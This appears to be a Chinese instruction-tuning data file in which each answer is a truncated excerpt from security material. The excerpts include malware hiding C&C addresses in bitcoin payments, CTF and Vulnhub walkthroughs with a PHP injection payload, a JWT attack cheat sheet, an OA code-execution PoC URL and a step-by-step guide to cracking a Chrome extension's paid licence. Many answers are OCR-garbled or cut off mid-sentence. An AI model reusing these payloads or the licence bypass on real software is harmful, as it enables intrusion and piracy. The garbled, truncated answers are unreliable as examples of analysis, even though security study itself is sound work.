大多数藏在TOR网关后面难以被定位 实现技术 我们需要将特定的比特币接收地址硬编码进恶意软件加载器的源代码中通过api接口监视付款交易比 如api.blockcypher.com从接口中检索出与接收地址相关的最近的交易记录用一种机制解码出当前 使用的C&C server的IP地址 接下来说说这个编码解码的机制首先我们以一个1BkeG开头的地址硬编码进恶意软件加载器中 的从一个或多个其他比特币地址比特币数量在0.0000101-0.00065278或者0.12USD-70.75USD之 间变化) 接收付款而我们需要编码的C&C server的IP地址就是交易量来编码出来的通过十六进制先转 换satoshi聪的交易值并交换两个字节再转化为十进制拼接组成 这里的satoshi是比特币的最小单位1satoshi=0.00000001BTC我觉得攻击者利用satoshi作单 位应该是能构造出一个五位数从而转化为两个十六进制字节从而进行操作 而此时我们取最近的两次交易发送特定数量的btc就能构造出4组字节从而拼接成ip地址 这里的付款人被称为\"发件人\"接收地址称为\"IP信号\"由恶意软件加载器监控 而技术也不是空头理论已经有攻击者应用到恶意软件中去具体案例是名为Pony的恶意软件 关于改进策略 原先的机制通过两次单独的交易向服务器IP地址发出信号当使用两个单独的事务时仅当包括交易并 由开采区块链中下一个区块的人确认并通过交易时通过比特币系统发送的付款才是最终的交易通过 区块链网络的传播会产生一些延迟此外矿工将独立确定将哪些交易包括在其区块中因此如果恶 意软件所有者发送两个交易的顺序不同僵尸程序将组成错误的IP地址 攻击者正在试验和完善两种策略来避免和缓解这些操作问题我们将使用的第一个策略称为时间滞后 其中延迟发送事务以将其延迟到不同的块中后来对手试图通过向矿工支付更高的奖励来控制区块链 的行为我们将其称为费用命令 时间滞后 为了确保交易的顺序让僵尸程序正确识别C&C server的IP地址攻击者提出了一种简单且明显有效的策 略是确保在其中一项交易之前先记录下来这是在两者之间造成人为的延迟只有在第一个交易在一个 区块中得到确认并在整个网络中传播后才触发第二个交易但代价是存在一个间歇性的时间段在此 期间要是有别的交易僵尸程序将通过解码新的和旧的交易值来组成错误的CC地址 费用命令 付款被包含在区块链中的方式不仅是一个问题它在什么时候发送而且是如何付款的为了将交易包 括在区块链中发送者必须支付一定的费用该费用取决于交易的大小以字节为单位但发送方可 以选择提供更高的费用以增加矿工将交易包括在当前开采的区块中的动力 通过设置正确的费用金额恶意软件所有者可以影响两个交易的优先级并成为同一区块的一部分同时 仍保持正确的顺序 然而使用更高的费用来提高激励机制也会增加操作系统的支出并提出了一个问题即在不向矿工支 付过多费用的情况下将区块高度差降低到0的正确费用是什么尽管找到了可以有效地抵御宕机的策 略但在恶意软件作者试图优化这种关系之后运营成本似乎已经", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Cody's First Blog - FLAG2 ## 0x00 Modifiy URL Parameter Try modify the url http://127.0.0.1/xxxxxxxxxx/?page=admin.inc To http://127.0.0.1/xxxxxxxxxx/?page=index The error shows ``` Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 16384 bytes) in /app/index.php on line 20 ``` So it will append **.php** at the end and execute the file. ## 0x01 SSRF / Inclusion Bug http://127.0.0.1/xxxxxxxxxx/?page=http://localhost/index Both the XSS and phpinfo() injection executed properly. But still no flag. ![](./imgs/ssrf.jpg) ## 0x02 Read File Add a new comment to read index.php. ``` php <?php echo readfile(\"index.php\")?> ``` And approve it in admin page. ![](./imgs/approve.jpg) ## 0x03 FLAG Press **F12** to check the source again. ![](./imgs/flag.jpg) It print out the whole index.php file. ```php <?php // FLAG{FLAG2}$FLAG$ mysql_connect(\"localhost\", \"root\", \"\"); mysql_select_db(\"level4\"); $page = isset($_GET['page']) ? $_GET['page'] : 'home.inc'; if(strpos($page, ':') !== false && substr($page, 0, 5) !== \"http:\") $page = \"home.inc\"; if(isset($_POST['body'])) { mysql_query(\"INSERT INTO comments (page, body, approved) VALUES ('\" . mysql_real_escape_string($page) . \"', '\" . mysql_real_escape_string($_POST['body']) . \"', 0)\"); if(strpos($_POST['body'], '<?php') !== false) echo '<p>FLAG{FLAG1}$FLAG$</p>'; ?> ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWEAPONIZING THE BBC MICRO:BIT DAMIEN \" \" CAUQUIL VIRTUALABS DEF CON 25 - JULY 28, 2017 /ME Head of R&D, Econocom Digital Security Senior security researcher HW/SW Reverse-engineer AGENDA BBC Micro:Bit Features & Capabilities Hacking ideas Hacking into the Micro:Bit Turning the Micro:Bit into a sniffer Hacking various 2.4GHz protocols Demos Wireless keylogger Quadcopter hijacking Radiobit BBC MICRO:BIT FEATURES 5x5 LED matrix 2 buttons Custom expansion connector Wireless capabilities MicroPython ! $15 HARDWARE SPECIFICATIONS nRF51822: 2.4 GHz GFSK transceiver 256 KB Flash 16 KB RAM 6 ADCs SPI bus I2C bus 20 GPIO 3V powered (2 x AAA) EASY TO PROGRAM READ EVALUATE PRINT LOOP $ minicom -D /dev/ttyACM0 -b 115200 MicroPython v1.7-9-gbe020eb on 2016-04-18; micro:bit with nRF51822 Type \"help()\" for more information. >>> help() Welcome to MicroPython on the micro:bit! Try these commands: display.scroll('Hello') running_time() sleep(1000) button_a.is_pressed() [...] WIRELESS CAPABILITIES Legacy ShockBurst Protocol (SB) Enhanced ShockBurst Protocol (ESB) Bluetooth Low Energy (BLE) ENHANCED SHOCKBURST PROTOCOL Designed by Nordic Semiconductor Used by various wireless mice and keyboards Attacked by Marc Newlin during DEF CON 24 BASTILLE VS. KEYBOARDS/MICE MouseJack framework Great tool to sniff/attack keyboards and mice Open source Written in Python http://www.mousejack.com/ GOODSPEED VS. NRF24L01+ Travis Goodspeed managed to turn it into a sniffer source: Travis' blog SAMY KAMKAR'S KEYSWEEPER http://samy.pl/keysweeper/ DSMX HIJACKING TOOL source: The Register (extract from the FireFly example code) OFFENSIVE PYTHON ? # Event loop. while True: if button_a.was_pressed(): radio.send('flash') # a-ha incoming = radio.receive() if incoming == 'flash': sleep(random.randint(50, 350)) display.show(flash, delay=100, wait=False) if random.randint(0, 9) == 0: sleep(500)s radio.send('flash') # a-ha HACKING INTO THE MICRO:BIT PROMISCUITY IS THE NRF51822'S DUTY (TOO) GOODSPEED'S NRF24L01+ HACK P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Enter Space-Time Coordinates Category: Misc. ## Description > Ok well done. The console is on. It's asking for coordinates. Beating heavily on the console yields little results, but the only time anything changes on your display is when you put in numbers.. So what numbers are you going to go for? You see the starship's logs, but is there a manual? Or should you just keep beating the console? A binary file was attached. ## Solution Let's start by running the program: ```console root@kali:/media/sf_CTFs/google/Enter_Space_Time_Coordinates# ./rand2 Travel coordinator 0: AC+79 3888 - 98071128902306, 227382149184267 1: Pliamas Sos - 272066008193594, 113707484169060 2: Ophiuchus - 128283301225840, 43562014214202 3: Pax Memor -ne4456 Hi Pro - 270921358930721, 242857169312391 4: Camion Gyrin - 172610997163993, 45283555200205 5: CTF - <REDACTED> Enter your destination's x coordinate: >>> 100 Enter your destination's y coordinate: >>> 101 Arrived somewhere, but not where the flag is. Sorry, try again. ``` We get the chance to enter our destination coordinates, but randomly entering some coordinates brings out nowhere. ### Option 1 - The Easy Way: Just run `strings` on the binary: ```console root@kali:/media/sf_CTFs/google/Enter_Space_Time_Coordinates# strings rand2 | grep CTF Arrived at the flag. Congrats, your flag is: CTF{welcome_to_googlectf} ``` ### Option 2 - The Slightly Less Easy Way We open the file in Ghidra. The decompiled output of the main function is: ```c undefined8 main(void) { int r; long lVar1; long lVar2; long y_coord; long x_coord; ulong i; seed = time((time_t *)0x0); puts(\"Travel coordinator\"); i = 0; while (i < 6) { printf(\"%zu: %s - \",i,*(undefined8 *)(destinations + i * 8)); r = strcmp(*(char **)(destinations + i * 8),\"CTF\"); if (r == 0) { puts(\"<REDACTED>\"); } else { lVar2 = next_destination(); lVar1 = next_destination(); printf(\"%zu, %zu\\n\",lVar1,lVar2); } i = i + 1; } printf(\"\\nEnter your destination\\'s x coordinate:\\n>>> \"); __isoc99_scanf(&DAT_0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeyond Root Custom Firmware For Embedded Mobile Chipsets Biography Christopher Wade Security Consultant at Pen Test Partners @Iskuri1 https://github.com/Iskuri https://www.pentestpartners.com Project Origin Smartphones contain a huge amount of closed firmware This limits the capabilities of even rooted devices By breaking firmware protections and reverse engineering embedded chipsets, smartphones can be used as attack tools Wi-Fi Monitor Mode Many smartphones support Wi-Fi Monitor Mode Activated in Snapdragon chipsets via: echo 4 > /sys/module/wlan/parameters/con_mode Broadcom chipsets can utilise custom firmware Well known, implemented in modern mobile testing tools USB Device Emulation Linux Kernel supports emulating USB devices via GadgetFS This can be used to emulate any standard USB device Rarely used, but very effective Debian Chroot A full Debian Root Filesystem can be generated with qemu-debootstrap A simple script can provide hardware access and direct SSH connectivity: mount -o remount,rw /data mount --bind /proc /data/debian_arm64/proc mount --bind /sys /data/debian_arm64/sys mount --bind /dev /data/debian_arm64/dev mount devpts /data/debian_arm64/dev/pts -t devpts chroot /data/debian_arm64/ /bin/bash --login -c /usr/sbin/sshd & NFC On Android  Standard Functionality NFC on Android is restricted to very specific features: Generic Reader Modes Mobile Payments NDEF Communication Host-Card Emulation NFC On Android  Unsupported Functionality Desired features for an NFC attack tool: Reader Based Attacks Raw Tag Emulation Passive Sniffing Target Device Samsung S6 - SM-G920F Older smartphone  readily available Allows for OEM unlocking and deployment of Custom ROMs Found to use a proprietary Samsung Semiconductor NFC Controller in non-US versions NFC Controller  S3FWRN5 Custom chip developed by Samsung Semiconductor Utilised in non-US Samsung S6, and Note 4 devices Boasts the ability to securely update firmware Utilises ARM SC000 SecurCore architecture Communicat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Raven:1 > https://download.vulnhub.com/raven/Raven.ova 靶场IP`192.168.32.207` 扫描对外端口服务 ``` (rootkali)-[~/Desktop] # nmap -p 1-65535 -sV 192.168.32.207 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 05:28 EDT Nmap scan report for 192.168.32.207 Host is up (0.00091s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 43608/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:60:91:44 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds ``` 浏览器访问80端口 ![image-20220906173336561](../../.gitbook/assets/image-20220906173336561.png) 爆破目录 ``` (rootkali)-[/tmp] # dirb http://192.168.32.207 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue Sep 6 22:39:28 2022 URL_BASE: http://192.168.32.207/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.207/ ---- ==> DIRECTORY: http://192.168.32.207/css/ ==> DIRECTORY: http://192.168.32.207/fonts/ ==> DIRECTORY: http://192.168.32.207/img/ + http://192.168.32.207/index.html (CODE:200|SIZE:16819) ==> DIRECTORY: http://192.168.32.207/js/ ==> DIRECTORY: http://192.168.32.207/manual/ + http://192.168.32.207/server-status (CODE:403|SIZE:302) ==> DIRECTORY: http://192.168.32.207/vendor/ ==> DIRECTORY: http://192.168.32.207/wordpress/ ``` 访问`/wordpress/ ` ![image-20220907104050444](../../.gitbook/assets/image-20220907104050444.png) 使用wpscan枚举用户 ``` (rootkali)-[/tmp] # wpscan --url http://192.168.32.207/wordpress/ -eu ``` ``` [+] michael | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] steven | Found By: Au", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我是如R挖各SRC漏洞的 目 录 一S为外行对信息安全的理解和看法 二为什么会喜欢挖漏洞 三对此事定位布局 四了解游戏规则 C了解自己想做的和能做的 目 录 六情报收集,从远处看细节 七选择容易忽视的问题,避开高手 八了解(开发实施安全  人员的细微关系和情绪 九一个有意思的漏洞 p一个有意义的漏洞 一S为外行对信息安全的理解和看法 由于之前不知道什么是信息安全,一开始的想法 就是信息安全黑客 ,然后就是下面这样的 二为什么喜欢挖漏洞 如果说追女朋友是h(m太旺盛,那么挖漏洞可 能就是因为女朋友不在家 其实可能是因为小时候电视的影响,一直 对)黑客这个词有很大的向往,但是一直没找i 机会去接触这个行业 在去年底的某一天,刚好有个同事喜欢刷 微博,提i有)SRC这个词,r来这个黑安全 相关 三对此事的定位和布局 确定了自己喜欢做的事情,选择目标很重要,为什 么会在众多SRC里面选择,阿里和携程 四了解游戏规则 其实最关键是什么不能做,什么能做 C了解自己想做的和能做的 由于不懂什么是漏洞,在了解规则后,发现自己 会的只有那么一点,那么,如R把尽会的一点点 东西利用在这个漏洞挖掘场景中呢 六情报收集,从远处看细节 ! 以业务为驱m,了解目标旗下所有的子公司 分公司以及并购等相关业务 ! 以渗透测试的思维收集目标信息,主要包括 域名ip范围开源社区关于公司相关的 代码员工信息等 七选择容易忽视的问题,避开高手 ! ! ! * 设计 开发 实施 八了解(开发实施安全  人员的细 微关系和情绪 听说程序员的天敌是产品经理和安全人员,那么由于 心理矛盾,多少会在工S配合方面出现写问题 这里的细微关系和一些综合因素,就很容易造成如 漏洞U复不完整,漏哪补哪等等现象 九一个有意思的漏洞 在逛西湖的过程中,感觉自己之前看i某系统有些 问题,回去经过仔细观察,果然h有洞天,大致情况 如以下URL http://**.******.***/iphone/ENIndex.****? verify=tuTwunsZnn_5Tttw 灵感出现 对算法的理解 通过算法重构验证参数,最终实现任意用户登陆 p一个有意义的漏洞 在一次扫马路的过程中,发现一运维问题,无意 中进了大公司内网,第一L事想着就是继续测试,但 后来在前辈的指导下,才发现这是不符合游戏规则的 但在此同时,也发现这是自己很有兴趣做的一L事 ,好像是叫渗透测试 运气很重要 谢 谢", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTOOLSMITHING AN IDA BRIDGE: A TOOL BUILDING CASE STUDY Adam Pridgen Matt Wollenweber Presentation Agenda  Motivation and Purpose  Toolsmithing  Identifying the short-cuts to meet project needs  Processes for Expediting Development  Prototyping, Modifying, Testing, Restart?!?  Extension development with WinDbg  Idabridge demonstration Introductions: Adam  TODO Add pertinent Information  Who I am.  What I have done.  Where I am going. Introductions: Matt  TODO Add pertinent Information  Who I am.  What I have done.  Where I am going. Motivation and Purpose  Learn and teach methods for developing tools  Introduce toolsmithing to those interested in tool development  Discuss what we learned from implementing our tool  Release an Alpha version of our idabridge Toolsmithing  Toolsmithing is the process of making tools  Tools can be in any space  Generally, not a standalone application  Ranges from short scripts to full blown libraries  Focus on utility not usability  Takes on the following forms  X is needed to make Y create widgets  Z needs to be built, but nothing exists currently Toolsmithing Tools  High Level Languages (Python or Ruby)  HL Programming Environments (iPython)  Debuggers (PDB, WinDbg, Olly, etc.)  Network Sniffers for network debugging  Books and code lying around the home or net  Anything that gets the job done fast Our Toolsmithing Process  Building is Believing  Loner Development Squads  The World is Big Chances are it exists  Dont reinvent the wheel, steal one  KISS your tools they love you Building is Believing  Good tools are not built overnight  Sometimes maybe  Build it once to get an idea  Build it again because the 2nd time shine  Third time is a charm  More than one implementation is likely  idabridges cmd handling took 3 iterations  Build to what is needed now Loner Development Squads  Creating Milestones  Milestones should aggregate into something  Keep milestones small when developing alone  Keep a friend (esp one who cares) on speed dial  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nICS 点击此处添加中国标准文献分类号 备案号 中 华 人 民 共 和 国 行 业 标 准 XX/T XXXXXXXXX 研发运营一体化DevOps能力成熟度模 型 第 5 部分应用设计 The capability maturity model of DevOps Part 5: Application Design 点击此处添加与国际标准一致性程度的标识 征求意见稿 - XX - XX 发布 XXXX - XX - XX 发 布 XX/T XXXXXXXXX I 目录! 前言.................................................................................. II! 研发运营一体化DevOps能力成熟度模型 第 5 部分应用设计.............................. 1! 1 范围................................................................................. 1! 2 规范性引用文件....................................................................... 1! 3 术语................................................................................. 1! 3.1 软件架构 Software Architecture................................................... 1! 3.2 应用程序 Application............................................................. 1! 3.3 运行时环境 Runtime Environment................................................... 1! 3.4 软件包 Software Package.......................................................... 1! 4 缩略语............................................................................... 1! 5 应用设计............................................................................. 2! 5.1 应用接口......................................................................... 2! 5.2 应用性能......................................................................... 4! 5.3 应用扩展......................................................................... 6! 5.4 故障处理......................................................................... 8! A..................................................................................... 10! A..................................................................... 错误! 未定义书签! 附 录 A 规范性附录 五级度量指标定义............................. 错误! 未定义书签! 参考文献.............................................................................. 11! XX/T XXXXXXXXX II 前 言 研发运营一体化是指在IT软件及相关服务的研发及交付过程中将应用的需求开发测试部署 和运营统一起来基于整个组织的协作和应用架构的优化实现敏捷开发持续交付和应用运营的无缝 集成帮助企业提升IT效能在保证稳定的同时快速交付高质量的软件及服务灵活应对快速变化的 业务需求和市场环境 本标准是研发运营一", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# JWT - JSON Web Token > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. ## Summary - [Summary](#summary) - [Tools](#tools) - [JWT Format](#jwt-format) - [Header](#header) - [Payload](#payload) - [JWT Signature](#jwt-signature) - [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042) - [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644) - [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235) - [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431) - [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114) - [JWT Secret](#jwt-secret) - [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret) - [Break JWT secret](#break-jwt-secret) - [JWT tool](#jwt-tool) - [Hashcat](#hashcat) - [JWT Claims](#jwt-claims) - [JWT kid Claim Misuse](#jwt-kid-claim-misuse) - [JWKS - jku header injection](#jwks---jku-header-injection) - [References](#references) ## Tools - [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) - [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) - [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61) - [jwt.io - Encoder  Decoder](https://jwt.io/) ## JWT Format JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)` Example : `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY` Where ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHVV动之某OA流量应急(): https://www.anquanke.com/post/id/239865 蹭波哥的热度 OA还得看系群友 商已发布版本补丁完成修复建议户尽快更新最新版本 某凌OA任意代码执 先看下捕获到的POC: /sys/common/dataxml.jsp?s_bean=sysFormulaValidate&script= <payload>&type=int&modelName=test 漏洞出现在 /sys/common/dataxml.jsp 下 同样类型还有个 sys/common/datajson.jsp 代码: <%@ page language=\"java\" contentType=\"application/x-javascript; charset=UTF-8\" pageEncoding=\"UTF-8\"%> <%@ page errorPage=\"/resource/jsp/jsperror.jsp\" %> <%@ page import=\"org.springframework.context.ApplicationContext, org.springframework.web.context.support.WebApplicationContextUtils, com.landray.kmss.common.service.IXMLDataBean, com.landray.kmss.common.actions.RequestContext, com.landray.kmss.util.StringUtil, java.util.* \"%> <%@page import=\"net.sf.json.JSONObject\"%> <%@page import=\"net.sf.json.JSONArray\"%> <% response.setHeader(\"Cache-Control\", \"no-cache\"); response.setHeader(\"Pragma\", \"no-cache\"); response.setDateHeader(\"Expires\", -1); ApplicationContext ctx = WebApplicationContextUtils.getRequiredWebApplicationContext(session .getServletContext()); RequestContext requestInfo = new RequestContext(request); String[] beanList = request.getParameter(\"s_bean\").split(\";\"); IXMLDataBean treeBean; List result = null; HashMap nodeMap; Object node; Object[] nodeList; Iterator attr; for(int i=0; i<beanList.length; i++){ treeBean = (IXMLDataBean) ctx.getBean(beanList[i]); result = treeBean.getDataList(requestInfo); if(result!=null){ JSONArray jsonArray=new JSONArray(); for (Iterator iterator = result.iterator(); iterator.hasNext();) { node = iterator.next(); if(node instanceof HashMap){ Map<String, Object> parseObj =(Map<String, Object>)node; JSONObject json=new JSONObject(); for(String key1 : parseObj.keySet()){ Object value1=parseObj.get(key1); json.accumulate(key1, value1); } jsonArray.add(json); }else if(node instanceof Object[]){ nodeList = (Object[])node; JSONObject json=new JSONObject(); for(int k=0; k<nodeList.length; k++){ if(nodeList[k]!=null){ String key2 = \"key\"+k; Object value2 = nodeList[", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nINTERSTATE: A Stateful Protocol Fuzzer for SIP Thoulfekar Alrahem, Alex Chen, Nick DiGiussepe, Jefferey Gee, Shang-Pin Hsiao, Sean Mattox, Taejoon Park, Albert Tam, Ian G. Harris Department of Computer Science University of California Irvine Irvine, CA 92697 USA harris@ics.uci.edu Marcel Carlsson FortConsult Tranevej 16-18 2400 Copenhagen NV Denmark mc@fortconsult.net Abstract We present the INTERSTATE fuzzer to detect security vulnerabilities in VOIP phones which implement Session Initiation Protocol (SIP). INTERSTATE generates an input sequence for a SIP phone which is constructed to reveal common security vulnerabilities. SIP is a stateful protocol so a state machine description of the SIP protocol is used by INTERSTATE to ensure that the entire state space is explored. The input sequence consists of SIP request messages as well as GUI input sequences which are remotely applied to the phone under test. The input sequence is generated to perform a random walk through the state space of the protocol. The application of GUI inputs is essential to ensure that all parts of the state machine can be tested. Faults are injected into SIP messages to trigger common vulnerabilities. INTERSTATE also checks the SIP response messages received from the phone under test against the expected responses described in the state machine. Checking response messages allows for the detection of security bugs whose impact is more subtle than a simple crash. We have used INTERSTATE to identify a previously unknown DoS vulnerability in an existing open source SIP phone. The vulnerability could not have been discovered without exploring multiple paths through the state machine, and applying GUI inputs during the fuzzing process. 1 Introduction Several factors have combined to dramatically increase the significance of the computer security problem and the need for computer security research. Software security, a subfield of computer security, has attracted significant research attention relative", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBackground 越来越多的软件和网站都推出了夜间模式, 所以最近夜间冲浪的时候经常从黑色的IDE切换到白色的网页的时候, 总会瞎眼一波, 就从谷歌插件商店搜了几个能把网页转换成夜间模式的插件, 最终决定用Night Eye. 不同于一般的只会修改background-color: black的插件, 这款插件通过算法来进行各种颜色调整, 既可以让 网页变成夜间模式, 也不会导致黑色背景和黑色字体融为一体. 官网: https://nighteye.app/ 新用户有三个月免费试用, 然后是一年9刀或者40刀永久激活, 所以这里进行一波破解, 有能力购买的老板的还是 建议支持一下官方. 本文通过对这款插件做的一点微小的工作来进行一个解的破, 顺带学习一波chrome的插件开发和调试, 由于代码 虽然压缩了但是各种函数名字符号都还在, 可以通过搜索直接定位到检查函数, 所以搞起来比较简单. Chrome插件结构 Chrome插件基本由mainfest.json, content-script, background.js, popup组成 mainfest.json: 插件的配置文件 content-script: 用来向页面注入css和js background.js: 常驻于浏览器的一个脚本, 始终在运行 popup: 即点击插件的logo以后弹出的窗口 Chrome插件调试技巧 寻找插件源码 在chrome的地址栏输入chrome://version/后, 可以看到Profile Path: C:\\Users\\username\\AppData\\Local\\Google\\Chrome\\User Data\\Default 右键点击插件logo, 在Manage extensions里可以看到插件的ID, 我们这里的Night Eye的ID是 alncdjedloppbablonallfbkeiknmkdi, 于是插件代码路径为: C:\\Users\\username\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\alncdjedloppbablonallfbkeiknmkdi 其中home.js对应的是前文中的popup的代码 把源码复制一份出来进行修改, 由于代码改过了, 所以必须删除原版以后, 用chrome加载插件 通过调试找checker 根据脚本不同, 检查的代码位置也可能不一样, 比如Night Eye会在打开网页的时候提示试用过期, 所以猜测检查 代码应该是位于background.js或者content.js 调试background 在Manage extensions页面里, 点击background page即可调试background的代码 调试popup 右键点插件logo, Inspect pop-up 调试content-script 随便打开一个网页, 在开发者工具里, Source页面, 左上角选Content script即可 checker chrome的开发者工具可以格式化被压缩的js代码: 根据弹窗里的各种信息, 通过搜索activation, check等字符串, 定位到一个激活成功的函数 看起来是通过ajax向服务器验证以后根据返回来确定激活结果的, 在这里打个断点调试一波 右边的Scope可以看到各种变量的值, 这里的e应该就是服务器返回的数据, 满足if的条件时才会进入激活成功函 数 所以我们在源码里直接搜索这个函数修改一波, 直接把if的条件改成true, 改完以后点这里重新加载 可以看到激活成功了 但是我发现在打开新网页的时候又会变成过期状态, 所以推测background.js里可能存在检查, 调试一波, 方法类 似前面的, 通过搜索action, license等字符串找到一个检查函数 打上断点后随便找个网页打开, 重新加载插件就可以断了 可以看到t应该是服务器返回的数据, 是一个json, 我们把修改后的json字符串直接写进去试试 我寻思, 应该能行 总结 本文通过对一款夜间模式的chrome插件的源码探索和调试, 找到了证书检查函数并进行了修改, 进而可以白嫖, 通过实战学习了一波chrome的插件原理和开发, 调试流程. 由于这款插件代码压缩不够充分, 可以直接定位到检 查函数, 破解起来相对容易一些. Referce https://www.cnblogs.com/liuxianan/p/chrome-plugin-develop.html https://blog.csdn.net/qustdong/article/details/46046553", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVerisign CONFIDENTIAL Verisign CONFIDENTIAL Verisign iDefense Cyber Security Trends Rick Howard, iDefense General Manager June 22, 2011 2 How Technical Are You? 3 Agenda Operation Aurora Impact Stuxnet Impact Cyber Security Disruptors 4 Learning Points Theory Fact 5 Operation Aurora Impact 6 The Aurora Attacks  5 Unprecedented Changes 7 The Aurora Attacks  5 Unprecedented Changes 8 Defense Contractor 20 Smashed The Aurora Attacks  5 Unprecedented Changes 9 The Aurora Attacks  5 Unprecedented Changes 10 The Aurora Attacks  5 Unprecedented Changes 11 Moonlight Maze Titan Rain German Chancellor Angela Merkel The Aurora Attacks  5 Unprecedented Changes 12 \"We have been briefed by Google on these allegations, which raise very serious concerns and questions,\" she said. We look to the Chinese government for an explanation.\" Source: Network World: 13 Jan 2010 \"We look to Chinese authorities to conduct a thorough investigation of the cyber intrusions that led Google to make this announcement. We also look for that investigation and its results to be transparent.\" Source: Washington Times: 21 Jan 2010 \"It was a very open and candid conversation. We agreed we would continue this conversation in the context of our ongoing dialogue.\" Source: France 24: 28 Jan 2010 Foreign Minister Yang Jiechi The Aurora Attacks  5 Unprecedented Changes 13 The Aurora Attacks  5 Unprecedented Changes 14 The Aurora Attacks  5 Unprecedented Changes 15 $100,000,000 Vulnerability Assessment Capabilities Research The Aurora Attacks  5 Unprecedented Changes 16 The Aurora Attacks  5 Unprecedented Changes 17 Moonlight Maze Titan Rain The Aurora Attacks  5 Unprecedented Changes Byzantine Hades 18 The Aurora Attacks  5 Unprecedented Changes 19 The Aurora Attacks  5 Unprecedented Changes 20 Is Hard  But not Impossible Confidence is High The Aurora Attacks  5 Unprecedented Changes 21 Is Hard  But not Impossible Confidence is High The Aurora Attacks  5 Unprecedented Changes 22 The Aurora Attacks  5 Unprecedent", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: '2' services: web: image: vulhub/wordpress:4.6 depends_on: - mysql environment: - WORDPRESS_DB_HOST=mysql:3306 - WORDPRESS_DB_USER=root - WORDPRESS_DB_PASSWORD=root - WORDPRESS_DB_NAME=wordpress ports: - \"8080:80\" mysql: image: mysql:5 environment: - MYSQL_ROOT_PASSWORD=root", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDeviant Ollam & Howard Payne DEFCON 22  2014/08/03 ELEVATOR HACKING FROM THE PIT TO THE PENTHOUSE WHO ARE WE? http://enterthecore.net Who Are We ? Deviant Ollam  Physical Penetration Tester  Red Teamer  Lockpicker  Liquor of Choice: Lagavulin Howard Payne  Elevator Consultant & Inspector  Non-Union  Boardwalk Badass  Liquor of Choice: American Adjunct Lager http://enterthecore.net Who Are We ? Deviant Ollam  Physical Penetration Tester  Red Teamer  Lockpicker  Liquor of Choice: Lagavulin Howard Payne  Elevator Consultant & Inspector  Non-Union  Boardwalk Badass  Liquor of Choice: American Adjunct Lager WARNING! http://enterthecore.net If Used Properly Elevators are Incredibly Safe   NYC alone has almost 60,000 elevators  11 billion trips per year, 30 million every day  Annually there are only about 24 injuries requiring medical attention http://enterthecore.net If Used Properly Elevators are 